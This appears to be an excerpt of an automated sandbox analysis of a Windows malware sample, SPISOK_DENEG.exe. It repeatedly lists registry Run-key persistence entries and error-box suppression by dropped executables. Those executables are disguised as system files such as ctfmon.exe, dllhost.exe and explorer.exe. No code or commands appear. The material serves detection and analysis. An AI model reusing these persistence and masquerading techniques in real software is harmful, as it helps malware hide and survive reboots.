                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHostJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHostJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EbnrVuXczrPqjyiJGoZJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EbnrVuXczrPqjyiJGoZJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ChainPortsurrogateJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ChainPortsurrogateJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ChainPortsurrogateJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ChainPortsurrogateJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
